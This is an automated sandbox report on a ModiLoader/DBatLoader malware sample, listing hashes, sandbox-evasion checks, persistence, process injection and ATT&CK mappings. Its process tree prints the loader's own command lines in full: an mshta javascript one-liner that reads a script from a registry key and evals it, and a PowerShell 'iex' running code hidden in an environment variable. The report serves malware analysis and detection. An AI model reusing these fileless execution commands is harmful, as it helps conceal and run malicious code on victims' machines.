Analysis
-
max time kernel
150s -
max time network
149s -
platform
windows7_x64 -
resource
win7-20240903-en -
resource tags
-
submitted
17-09-2024 05:32
General
-
Target
e625fe4c3312480c67f1e9c1b9192ae8_JaffaCakes118.exe
-
Size
358KB
-
MD5
e625fe4c3312480c67f1e9c1b9192ae8
-
SHA1
14c9ba169345f63a70c1a6d7f99eced41a2086ec
-
SHA256
bd7a3f73ee6a51fa506b71b372a446d87bcc5bd60e5e448850be24fed3b4551b
-
SHA512
da3249ee99dbc5ab3b604263979d5606ec55df037225e78ba567569918cb392db11e57b0b2e44b6db9b89fc1cfb37ca48b1cf6ae554f94ef0bdcf63a80989db2
-
SSDEEP
6144:ulnl2YpyFjiU6XFPf4efCme+I47555/NdxHBO1e+4cAlA3:ZVFj4HNqlM7prswNs
Malware Config
Signatures
-
ModiLoader, DBatLoader
ModiLoader is a Delphi loader that misuses cloud services to download other malicious families.
-
Process spawned unexpected child process 1 IoCs
This typically indicates the parent process was compromised via an exploit or macro.
-
Checks for common network interception software 1 TTPs
Looks in the registry for tools like Wireshark or Fiddler commonly used to analyze network activity.
-
Looks for VirtualBox Guest Additions in registry 2 TTPs 1 IoCs
-
Looks for VirtualBox drivers on disk 2 TTPs 1 IoCs
-
ModiLoader Second Stage 62 IoCs
-
Looks for VMWare Tools registry key 2 TTPs 1 IoCs
-
Checks BIOS information in registry 2 TTPs 2 IoCs
BIOS information is often read in order to detect sandboxing environments.
-
Deletes itself 1 IoCs
-
Adds Run key to start application 2 TTPs 1 IoCs
-
Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs
Using powershell.exe command.
-
Maps connected drives based on registry 3 TTPs 2 IoCs
Disk information is often read in order to detect sandboxing environments.
-
Drops file in System32 directory 1 IoCs
-
Suspicious use of SetThreadContext 2 IoCs
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
System Location Discovery: System Language Discovery 1 TTPs 4 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
-
Modifies Internet Explorer settings 1 TTPs 2 IoCs
-
Modifies registry class 7 IoCs
-
Suspicious behavior: EnumeratesProcesses 64 IoCs
-
Suspicious behavior: MapViewOfSection 2 IoCs
-
Suspicious use of AdjustPrivilegeToken 1 IoCs
-
Suspicious use of WriteProcessMemory 20 IoCs
Processes
-
C:\Users\Admin\AppData\Local\Temp\e625fe4c3312480c67f1e9c1b9192ae8_JaffaCakes118.exe"C:\Users\Admin\AppData\Local\Temp\e625fe4c3312480c67f1e9c1b9192ae8_JaffaCakes118.exe"1⤵
- System Location Discovery: System Language Discovery
-
C:\Windows\system32\mshta.exe"C:\Windows\system32\mshta.exe" javascript:CprC5t="pq9TrI";n6o=new%20ActiveXObject("WScript.Shell");mMQB2VuD="XLdo4o4k";EP6V9o=n6o.RegRead("HKCU\\software\\SNq76KGS\\TS5TKggiw");IMM2dqu="rG3";eval(EP6V9o);Ahz9Bea="CAas3";1⤵
- Process spawned unexpected child process
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" iex $env:kvyy2⤵
- Command and Scripting Interpreter: PowerShell
- Drops file in System32 directory
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\regsvr32.exeregsvr32.exe3⤵
- Looks for VirtualBox Guest Additions in registry
- Looks for VirtualBox drivers on disk
- Looks for VMWare Tools registry key
- Checks BIOS information in registry
- Deletes itself
- Adds Run key to start application
- Maps connected drives based on registry
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
- Modifies Internet Explorer settings
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\regsvr32.exe"C:\Windows\SysWOW64\regsvr32.exe"4⤵
- System Location Discovery: System Language Discovery
-
-
-
Network
MITRE ATT&CK Enterprise v15
Privilege Escalation
Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
10KB
MD5bcfb51791ac49f08f8ffba06515757f3
SHA11900ce8c07e09e5e66c6d13d01f141faadcfb8d7
SHA256ee574743524514e03aa60e30378973b2a28517c7a016ea8d33d961b33e7eabe4
SHA5121bee6ccf63339a7c136fe55d08be9d20a55cee7f32ce1f6caff4d120d9905b6cbdce7e910830524734c123caf92f27ba88e2c342a01b637627c8d02606373f8b
-
Filesize
75B
MD5fbd9ac52d0100dc5b377af826e19d9ae
SHA138bdf4ce46f1d6b56da3278cf4bb4d9cfb642922
SHA2566e672e58a9cd44b8b3dae3056f6677c4ffb11a65a1dab5a351d444c9d8c52dfe
SHA5123c3f3b00bddc551286f1243c41bcba9fe34721bf2569816c095d73c3fbe9b7dc99e32e6ddbb8e0b10d972ceff8b2ac73b513ab75309b677a80bc5d7b0b53c86e
-
Filesize
1.3MB
-
Filesize
1.3MB
-
Filesize
1.3MB
-
Filesize
1.3MB
-
Filesize
1.3MB
-
Filesize
1.3MB
-
Filesize
1.3MB
-
Filesize
1.3MB
-
Filesize
1.3MB
-
Filesize
1.3MB
-
Filesize
1.3MB
-
Filesize
1.3MB
-
Filesize
1.3MB
-
Filesize
1.3MB
-
Filesize
1.3MB
-
Filesize
1.3MB
-
Filesize
1.3MB
-
Filesize
1.3MB
-
Filesize
1.3MB
-
Filesize
880KB
-
Filesize
4KB
-
Filesize
880KB
-
Filesize
1.3MB
-
Filesize
1.3MB
-
Filesize
1.3MB
-
Filesize
1.3MB
-
Filesize
1.3MB
-
Filesize
1.3MB
-
Filesize
1.3MB
-
Filesize
1.3MB
-
Filesize
1.3MB
-
Filesize
1.3MB
-
Filesize
1.3MB
-
Filesize
1.3MB
-
Filesize
1.3MB
-
Filesize
1.3MB
-
Filesize
1.3MB
-
Filesize
1.3MB
-
Filesize
1.3MB
-
Filesize
1.3MB
-
Filesize
1.3MB
-
Filesize
1.3MB
-
Filesize
1.3MB
-
Filesize
1.3MB
-
Filesize
1.3MB
-
Filesize
1.3MB
-
Filesize
1.3MB
-
Filesize
1.3MB
-
Filesize
1.3MB
-
Filesize
1.3MB
-
Filesize
1.3MB
-
Filesize
1.3MB
-
Filesize
1.3MB
-
Filesize
1.3MB
-
Filesize
880KB
-
Filesize
387KB
-
Filesize
880KB
-
Filesize
880KB
-
Filesize
880KB
-
Filesize
880KB
-
Filesize
880KB
-
Filesize
8KB
-
Filesize
8KB
-
Filesize
880KB
-
Filesize
387KB